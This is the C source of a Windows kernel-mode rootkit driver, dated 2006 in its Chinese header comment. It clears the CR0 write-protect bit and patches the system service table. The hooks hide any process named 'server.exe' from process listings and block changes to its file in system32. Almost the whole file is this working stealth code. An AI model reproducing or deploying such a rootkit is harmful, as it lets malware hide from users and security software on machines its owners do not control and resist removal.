sys.c

C 语言程序源码

/* ******************************************************************
	文件:PorcessHide.c
	挂钩80x86 CPU,WIN2K或更高版本的系统服务表,这个驱动用来隐藏指定进程
	和防止删除文件的
	code by gt2333588 from SEU (02/26/2006)
****************************************************************** */
/*包含的头文件*/
#include    <ntddk.h>
#include	"SYS.h"

/* ******************************************************************
    Macro for easy hook/unhook. On X86 implementations of Zw* func-
tions, the DWORD following the first byte is the system call number,
so we reach into the Zw function passed as a parameter, and pull the
number out. This makes system call hooking depe ndent ONLY on the 
Zw* function implementation not changing. 
****************************************************************** */
#define	SYSCALL(_function)  ServiceTable->ServiceTable[*(PULONG)((PUCHAR)_function+1)]

/* Pointer to system global service table */
PSRVTABLE               ServiceTable;



#pragma code_seg("SETHOOK")
/* Install System Call Hook */
VOID HookSystemCall()
{
   RealZwQuerySystemInformation = SYSCALL(ZwQuerySystemInformation);
   SYSCALL(ZwQuerySystemInformation) = (PVOID)HookZwQuerySystemInformation;

   RealZwSetInformationFile = SYSCALL(ZwSetInformationFile);
   SYSCALL(ZwSetInformationFile) = (PVOID)HookZwSetInformationFile;

   return;
}
#pragma code_seg()

#pragma code_seg("UNHOOK")
/* Uninstall System Call Hook */
VOID UnhookSystemCall()
{
   SYSCALL(ZwQuerySystemInformation) = (PVOID)RealZwQuerySystemInformation;
   SYSCALL(ZwSetInformationFile) = (PVOID)RealZwSetInformationFile;
   return;
}
#pragma code_seg()

#pragma code_seg("ENTRY")
/* Driver Entry */
NTSTATUS  DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
   NTSTATUS          nRet;
   PDEVICE_OBJECT	 lpHookDeviceObject;
   UNICODE_STRING    uszDeviceName,uszDriverName;
   /*初始化字符串*/    
   RtlInitUnicodeString(&uszDeviceName,L"\\Device\\WinHook");
   RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
   nRet =	IoCreateDevice(
					DriverObject, 0,
					&uszDeviceName,
          FILE_DEVICE_WINHOOK,
					0, TRUE,
					&lpHookDeviceObject
				);
   if(NT_SUCCESS(nRet)){
      /* Create Symboliclink for GUI */
      nRet = IoCreateSymbolicLink (&uszDriverName, &uszDeviceName );
      /* Create dispatch points for all routines */
      DriverObject->MajorFunction[IRP_MJ_CREATE]		  =
      DriverObject->MajorFunction[IRP_MJ_SHUTDOWN]        =
      DriverObject->MajorFunction[IRP_MJ_CLOSE]           =
      DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]  = DriverDispatch;
      DriverObject->DriverUnload                          = DriverUnload;
   }
   if(!NT_SUCCESS(nRet)){
      DbgPrint("******WinHook:Failed to create device!******\n");
      if(lpHookDeviceObject){
			IoDeleteDevice(lpHookDeviceObject);
	  }
	  IoDeleteSymbolicLink(&uszDriverName);
      return	nRet;
   }
	// UNProtect memory
	__asm
	{
		push	eax
		mov		eax, CR0
		and		eax, 0FFFEFFFFh
		mov		CR0, eax
		pop		eax
	} 
   /* Pointer to system table data structure is an NTOSKRNL export */
   ServiceTable = KeServiceDescriptorTable;
   DbgPrint("WinHook:SystemCallService: %x\n",ServiceTable);

	/* Install System Call Hook */
   HookSystemCall();
   DbgPrint("******WinHook:Hook System Call Service******\n");
	__asm
	{
		push	eax
		mov		eax, CR0
		or		eax, NOT 0FFFEFFFFh
		mov		CR0, eax
		pop		eax
	}
   return	STATUS_SUCCESS;
}
#pragma code_seg()

#pragma code_seg("PATCH")
/* Driver Dispatch */
NTSTATUS  DriverDispatch(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp)
{
   PIO_STACK_LOCATION   lpIrpStack;
   
   Irp->IoStatus.Status      = STATUS_SUCCESS;
   Irp->IoStatus.Information = 0;

   /* Get a pointer to the current location in the Irp. */
   lpIrpStack =IoGetCurrentIrpStackLocation(Irp);
   switch (lpIrpStack->MajorFunction) {
		case IRP_MJ_CREATE:
		case IRP_MJ_SHUTDOWN:
		case IRP_MJ_CLOSE:
		case IRP_MJ_DEVICE_CONTROL:
			DbgPrint("WinHook Dispatch\n");
			break;
   }

   IoCompleteRequest(Irp,IO_NO_INCREMENT);
   
   return	STATUS_SUCCESS;
}
#pragma code_seg()

#pragma code_seg("UNLOAD")
/* Driver Unolad */
VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{
   UNICODE_STRING   uszDriverName;

   DbgPrint("******WinHook Driver Unloading******\n");
	// UNProtect memory
	__asm
	{
		push	eax
		mov		eax, CR0
		and		eax, 0FFFEFFFFh
		mov		CR0, eax
		pop		eax
	} 
   /* Uninstall System Call Hook */
   UnhookSystemCall();
   /* Delete the symbolic link for this device */
   RtlInitUnicodeString(&uszDriverName,L"\\DosDevices\\WinHook");
   IoDeleteSymbolicLink(&uszDriverName);

   /* Delete the device object */
   IoDeleteDevice( DriverObject->DeviceObject );
   DbgPrint("******Deleted devices******\n");
	__asm
	{
		push	eax
		mov		eax, CR0
		or		eax, NOT 0FFFEFFFFh
		mov		CR0, eax
		pop		eax
	}
	return;
}
#pragma code_seg()

#pragma code_seg("HOOK")
/* Hook function,hook ZwQuerySystemInformation for hide process you setting. */
NTSTATUS  HookZwQuerySystemInformation( 
					IN  ULONG  SystemInformationClass, 
					IN  PVOID  SystemInformation, 
					IN  ULONG  SystemInformationLength, 
					OUT PULONG ReturnLength
		  ) 
{ 
	NTSTATUS			nRet; 
	UNICODE_STRING uszProcName;

	RtlInitUnicodeString(&uszProcName, L"server.exe");

	nRet =	(RealZwQuerySystemInformation)( 
					SystemInformationClass, 
					SystemInformation, 
					SystemInformationLength, 
					ReturnLength
			); 
	
	if(NT_SUCCESS(nRet)) 
	{
		if(SystemInformationClass==5)//进程列表调用
		{ 
			struct _SYSTEM_PROCESSES *lpCurr = (struct _SYSTEM_PROCESSES *)SystemInformation; 
			struct _SYSTEM_PROCESSES *lpPrev = NULL;
			
			if(lpCurr->NextEntryDelta){
			  ((char *)lpCurr += lpCurr->NextEntryDelta); 
			}

			while(lpCurr)
			{
				/* Hide the process you setting */
				if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0)
				{

					if(lpPrev) 
					{ 
						if(lpCurr->NextEntryDelta) { 
							lpPrev->NextEntryDelta += lpCurr->NextEntryDelta; 
						} 
						else { 
							lpPrev->NextEntryDelta = 0; 
						} 
					} 
					else { 
						if(lpCurr->NextEntryDelta) { 
							(char *)SystemInformation += lpCurr->NextEntryDelta; 
						} 
						else { 
							SystemInformation = NULL; 
						} 
					} 

					if(lpCurr->NextEntryDelta){
					  ((char *)lpCurr += lpCurr->NextEntryDelta); 
					}
					else { 
						lpCurr = NULL;
						break; 
					} 
				}	/* if (RtlCompareUnicodeString(&uszProcName, &lpCurr->ProcessName, 1) == 0) */

				/* View all over the process list */
				if(lpCurr != NULL) { 
					lpPrev = lpCurr;
					
					if(lpCurr->NextEntryDelta){
					  ((char *)lpCurr += lpCurr->NextEntryDelta); 
					}
					else{
					  lpCurr = NULL; 
					}			
				}

			} /* end while(lpCurr) */
		}	/* End if(SystemInformationClass==5) */
	}	/* End if(NT_SUCCESS(nRet)) */
	return nRet;
}
#pragma code_seg()

NTSTATUS HookZwSetInformationFile(IN HANDLE FileHandle,
                OUT PIO_STATUS_BLOCK IoStatusBlock,
                IN PVOID FileInformation,
                IN ULONG Length,
                IN FILE_INFORMATION_CLASS FileInformationClass)
{
	PFILE_OBJECT pFileObject;
	NTSTATUS nRet= ObReferenceObjectByHandle(FileHandle, GENERIC_READ, 
    *IoFileObjectType, KernelMode, (PVOID*)&pFileObject, 0);

	if(NT_SUCCESS(nRet))
	{
	   UNICODE_STRING uDosName;
	   nRet = IoVolumeDeviceToDosName(pFileObject->DeviceObject, &uDosName);
	   if (NT_SUCCESS(nRet))
	   {
	     if (!_wcsicmp(pFileObject->FileName.Buffer, L"\\WINDOWS\\system32\\server.exe") &&
	       !_wcsicmp(uDosName.Buffer, L"C:"))
	     {
	      ExFreePool(uDosName.Buffer);
	      return STATUS_ACCESS_DENIED;
	   }
	   ExFreePool(uDosName.Buffer);
	  }
	}
	return RealZwSetInformationFile(FileHandle, IoStatusBlock, FileInformation, 
			Length, FileInformationClass);
}